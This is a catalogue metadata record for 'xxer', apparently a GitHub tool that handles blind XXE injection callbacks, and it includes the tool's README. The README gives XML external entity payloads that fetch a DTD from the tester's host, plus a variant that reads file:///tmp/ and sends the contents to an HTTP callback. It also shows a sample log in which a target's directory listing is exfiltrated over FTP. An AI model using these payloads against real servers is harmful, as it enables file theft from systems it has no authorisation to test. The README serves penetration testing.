{"id":13843417,"url":"https://github.com/TheTwitchy/xxer","last_synced_at":"2025-07-11T19:31:22.287Z","repository":{"id":40990873,"uuid":"89190678","full_name":"TheTwitchy/xxer","owner":"TheTwitchy","description":"A blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by ONsec-Lab.","archived":false,"fork":false,"pushed_at":"2020-07-29T15:54:38.000Z","size":13,"stargazers_count":510,"open_issues_count":0,"forks_count":88,"subscribers_count":8,"default_branch":"master","last_synced_at":"2024-08-05T17:37:18.936Z","etag":null,"topics":["callback","python","xxe-injection"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/TheTwitchy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-04-24T02:44:39.000Z","updated_at":"2024-06-10T09:26:12.000Z","dependencies_parsed_at":"2022-08-02T18:00:15.652Z","dependency_job_id":null,"html_url":"https://github.com/TheTwitchy/xxer","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheTwitchy%2Fxxer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheTwitchy%2Fxxer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheTwitchy%2Fxxer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheTwitchy%2Fxxer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/TheTwitchy","download_url":"https://codeload.github.com/TheTwitchy/xxer/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225754970,"owners_count":17519180,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["callback","python","xxe-injection"],"created_at":"2024-08-04T17:02:07.545Z","updated_at":"2024-11-21T15:30:54.586Z","avatar_url":"https://github.com/TheTwitchy.png","language":"Python","funding_links":[],"categories":["Python (1887)","Python"],"sub_categories":[],"readme":"# xxer\nA blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by [ONsec-Lab](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb). Rewritten here because I don't like Ruby.\n\nBasically, this doesn't actually find XXE injection for you, it helps you deal with getting useful information back once you've found a vulnerable input. For actually finding vulnerable injection points, I recommend using a small HTTP payload and some sort of DNS callback service like [Burp Collaborator](https://portswigger.net/burp/help/collaborator.html). If Collaborator reports a DNS lookup, followed by an HTTP request, then you're good to go.\n\n## Target Audience\nIf you can explain what XXE injection is and how to find it, this is for you. If not, check out [vulnd_xxe](https://github.com/TheTwitchy/vulnd_xxe).\n\n## Examples\n\n### Options\n```\nroot@kali:~$ xxer.py -h\nusage: xxer [-h] [-v] [-q] [-p HTTP] [-P FTP] -H HOSTNAME\n\nXXE Injection Handler\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --version         show program's version number and exit\n  -q, --quiet           surpress extra output\n  -p HTTP, --http HTTP  HTTP server port\n  -P FTP, --ftp FTP     FTP server port\n  -H HOSTNAME, --hostname HOSTNAME\n                        Hostname of this server\n  -d DTD_FILE, --dtd DTD_FILE\n                        The DTD file used for the XXE attack\n\nOriginally from https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-\nserver.rb, rewritten in Python by TheTwitchy\n```\n\n### Basic Usage\n```\nroot@kali:~$ xxer.py -H kali.host.com\n                 \n _ _ _ _ ___ ___ \n|_'_|_'_| -_|  _|\n|_,_|_,_|___|_|  \n                 \nversion 1.0\n\ninfo: Starting xxer_httpd on port 8080\ninfo: Starting xxer_ftpd on port 2121\ninfo: Servers started. Use the following payload (with URL-encoding):\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u003c!DOCTYPE xmlrootname [\u003c!ENTITY % aaa SYSTEM \"http://kali.host.com:8080/ext.dtd\"\u003e%aaa;%ccc;%ddd;]\u003e\n\n\n127.0.0.1 - - [23/Apr/2017 20:59:04] \"GET /ext.dtd HTTP/1.1\" 200 -\ninfo: FTP: recvd 'USER fakeuser'\ninfo: FTP: recvd 'PASS aaaaaaaaaadescriptivefoldername\nIRS_LETTERS_2014_ANGRY\npasswords.txt\npictures_of_ex_hi_def\npictures_of_ex_ultra_hi_def\nszechuan_sauce_recipe.pgp\nTAXES2012\nTaxes2013\nTAXES2015\nTemporary Internet Files\n'\ninfo: FTP: recvd 'TYPE I'\ninfo: FTP: recvd 'EPSV ALL'\ninfo: FTP: recvd 'EPSV'\ninfo: FTP: recvd 'RETR b'\n```\n\n## \"Features\"\n  * Only has one exfiltration point (currently, the FTP password). Obviously this can be changed up as needed, but may require some basic code changes (specifically in the FTP handlers).\n  * Install via ``pip``. Needs at least a requirements.txt or a setup.py. For now just clone and run.\n  * Currently serves up everything in the folder in which it was run over HTTP. Probably not a huge security risk, but something you should be aware of, especially on a public server.\n  * Integrated server file/directory browsing as a future upgrade?\n\n## Troubleshooting\n  * I don't get a callback over HTTP to retrieve ``ext.dtd``.\n    * This could mean a number of things, mostly related to not being vulnerable to XXE:\n      * External entities may be disallowed. This can be done by rejecting DOCTYPE decclarations in documents, which I believe prevents XXE injection.\n      * It may also allow entities, but disallow entities from remote sources. I've seen this on some Python XML libraries.\n      * Outbound traffic could be blocked at a firewall, or requests may only go to whitelisted hosts.\n    * There could also be a typo in the payload or a bug. Check the generated ``ext.dtd`` file to make sure everything looks correct. \n    * If you get some sort of parsing error, make sure you apply URL encoding (or remove it, I dunno) to the payload. Basically make sure you have the \"correct\" amount of encoding.\n  * The initial HTTP callback for ext.dtd works, but after that I see nothing.\n    * This could mean that FTP as a protocol is disabled server-side. Try changing the FTP callback in ``ext.dtd`` to an HTTP one, like ``\u003c!ENTITY % bbb SYSTEM \"file:///tmp/\"\u003e\u003c!ENTITY % ccc \"\u003c!ENTITY \u0026#37; ddd SYSTEM 'http://HOSTNAME:8080/b'\u003e\"\u003e``. If you get a callback to the /b document, this is probably the case. Try using the gopher protocol as well, but this was removed in Java 1.6.32 (or something close).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheTwitchy%2Fxxer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTheTwitchy%2Fxxer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheTwitchy%2Fxxer/lists"}